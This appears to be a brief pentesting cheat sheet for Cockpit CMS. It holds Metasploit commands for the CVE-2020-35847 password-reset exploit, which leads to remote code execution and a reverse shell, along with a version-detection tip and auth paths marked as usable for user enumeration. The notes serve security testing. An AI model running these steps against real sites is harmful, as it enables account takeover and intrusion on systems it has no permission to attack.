Cockpit CMS Pentesting

Cockpit CMS is a content management system for publishing contents.

Enumeration & Remote Code Execution (RCE) & Reverse Shell

# Reset password  (CVE-2020-35847)
msf> use exploit/multi/cockpit_cms_rce
msf> set USER admin
msf> run

Version Detection

Cockpit CMS version is displayed as the value of “data-version” attribute in html tag.

<html lang="en" data-base="/" data-route="/" data-version="0.11.1" data-locale="en">

Common Directories

/auth/check # We can enumerate users using the path
/auth/forgotpassword
/auth/index
/auth/login
/auth/requestreset # We can enumerate users using the path